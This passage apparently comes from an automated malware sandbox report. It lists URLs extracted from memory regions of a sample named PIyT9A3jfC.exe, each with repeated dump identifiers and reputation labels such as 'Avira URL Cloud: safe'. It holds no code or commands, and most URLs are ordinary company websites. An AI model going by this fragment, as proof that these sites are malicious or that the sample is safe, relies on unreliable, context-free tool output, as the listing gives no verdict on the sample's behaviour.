                                                                                                                                                                                                                                                  http://www.pcgrate.com/wp-content/themes/dt-the7/js/main.min.js?ver=9.12.0PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711712128.0000000008200000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.719328991.0000000003F00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600219649.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.597343850.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.758730892.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.756557417.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.797618634.00000000043B0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                  • Avira URL Cloud: safe
                                                                                                                                                                                                                                                  unknown
                                                                                                                                                                                                                                                  http://gholographic.com/PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711712128.0000000008200000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.719328991.0000000003F00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600219649.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.597343850.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.758730892.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.756557417.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.797618634.00000000043B0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                  • Avira URL Cloud: safe
                                                                                                                                                                                                                                                  unknown
                                                                                                                                                                                                                                                  http://pohlfood.com/wp-content/plugins/wc-product-table-pro/assets/css.min.css?ver=2.1.0PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.799425156.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.692272260.00000000042A0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                  • Avira URL Cloud: safe
                                                                                                                                                                                                                                                  unknown
                                                                                                                                                                                                                                                  http://hotel-amadeus-frankfurt.de/de/termine/detail/~id.22/Museumsuferfest-2013-23.-25.08.2013.htmlPIyT9A3jfC.exe, 00000001.00000003.797618634.00000000043B0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                  • Avira URL Cloud: safe
                                                                                                                                                                                                                                                  unknown
                                                                                                                                                                                                                                                  https://www.elpro.si/kategorija-izdelka/kabli-zice-in-konektorji/podaljski-za-termoclene-termoelemenPIyT9A3jfC.exe, 00000001.00000003.591320505.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.707249278.0000000005320000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711261081.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.589261694.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.592266018.0000000003DA0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.705219127.00000000046A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.590489760.0000000006210000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.708099580.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.709735434.0000000004BB0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.595344456.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.594022071.0000000003D70000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                  • Avira URL Cloud: safe
                                                                                                                                                                                                                                                  unknown
                                                                                                                                                                                                                                                  https://www.ora-ito.com/PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.676941396.00000000013CD000.00000004.00000020.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687770203.00000000013C7000.00000004.00000020.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.797618634.00000000043B0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                  • Avira URL Cloud: safe
                                                                                                                                                                                                                                                  unknown
                                                                                                                                                                                                                                                  https://tickets.suresupport.com/faq/article-1596/enPIyT9A3jfC.exe, 00000001.00000003.591320505.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.707249278.0000000005320000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711261081.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.589261694.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.592266018.0000000003DA0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.590489760.0000000006210000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.708099580.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.709735434.0000000004BB0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.595344456.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.594022071.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.719328991.0000000003F00000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                  • Avira URL Cloud: safe
                                                                                                                                                                                                                                                  unknown
                                                                                                                                                                                                                                                  http://www.elpro.si/wp-includes/js/dist/vendor/wp-polyfill.min.js?ver=3.15.0PIyT9A3jfC.exe, 00000001.00000003.591320505.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.707249278.0000000005320000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711261081.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.589261694.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.592266018.0000000003DA0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.705219127.00000000046A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.590489760.0000000006210000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.708099580.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.709735434.0000000004BB0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.595344456.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.594022071.0000000003D70000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                  • Avira URL Cloud: safe
                                                                                                                                                                                                                                                  unknown
                                                                                                                                                                                                                                                  http://www.pcgrate.com/wp-content/plugins/elementor/assets/lib/eicons/fonts/eicons.woff?5.10.0)PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711712128.0000000008200000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.719328991.0000000003F00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600219649.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.597343850.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.758730892.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.756557417.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.797618634.00000000043B0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                  • Avira URL Cloud: safe
                                                                                                                                                                                                                                                  unknown
                                                                                                                                                                                                                                                  https://www.lrsuk.com/PIyT9A3jfC.exe, 00000001.00000003.714841483.000000000138B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                  • Avira URL Cloud: safe
                                                                                                                                                                                                                                                  unknown
                                                                                                                                                                                                                                                  https://www.elpro.si/kategorija-izdelka/wika-partner/pigalicapi.exe, 00000004.00000003.791858177.0000000003280000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                  • Avira URL Cloud: safe
                                                                                                                                                                                                                                                  unknown
                                                                                                                                                                                                                                                  http://www.elpro.si/wp-content/plugins/mailchimp-for-woocommerce/public/js/mailchimp-woocommerce-pubPIyT9A3jfC.exe, 00000001.00000003.591320505.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.707249278.0000000005320000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711261081.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.589261694.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.592266018.0000000003DA0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.705219127.00000000046A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.590489760.0000000006210000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.708099580.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.709735434.0000000004BB0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.595344456.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.594022071.0000000003D70000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                  • Avira URL Cloud: safe
                                                                                                                                                                                                                                                  unknown
                                                                                                                                                                                                                                                  http://www.pcgrate.com/wp-content/uploads/the7-css/css-vars.css?ver=899328ee298ePIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711712128.0000000008200000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.719328991.0000000003F00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600219649.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.597343850.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.758730892.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.756557417.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.797618634.00000000043B0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                  • Avira URL Cloud: safe
                                                                                                                                                                                                                                                  unknown
                                                                                                                                                                                                                                                  http://myropcb.com/login/PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.758730892.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.756557417.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.797618634.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.654246349.0000000003C30000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                  • Avira URL Cloud: safe
                                                                                                                                                                                                                                                  unknown
                                                                                                                                                                                                                                                  https://www.com-sit.com/branchen-know-how/PIyT9A3jfC.exe, 00000001.00000003.654246349.0000000003C30000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                    high
                                                                                                                                                                                                                                                    http://www.elpro.si/wp-content/plugins/cf7-conditional-fields/style.css?ver=2.3.9PIyT9A3jfC.exe, 00000001.00000003.591320505.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.707249278.0000000005320000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711261081.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.589261694.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.592266018.0000000003DA0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.705219127.00000000046A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.590489760.0000000006210000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.708099580.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.709735434.0000000004BB0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.595344456.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.594022071.0000000003D70000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                                                                                                                                    unknown
                                                                                                                                                                                                                                                    https://www.elpro.si/kategorija-izdelka/elpro-posebne-izvedbe-temperaturnih-tipal/profesionalni-setiPIyT9A3jfC.exe, 00000001.00000003.591320505.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.707249278.0000000005320000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711261081.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.589261694.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.592266018.0000000003DA0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.705219127.00000000046A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.590489760.0000000006210000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.708099580.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 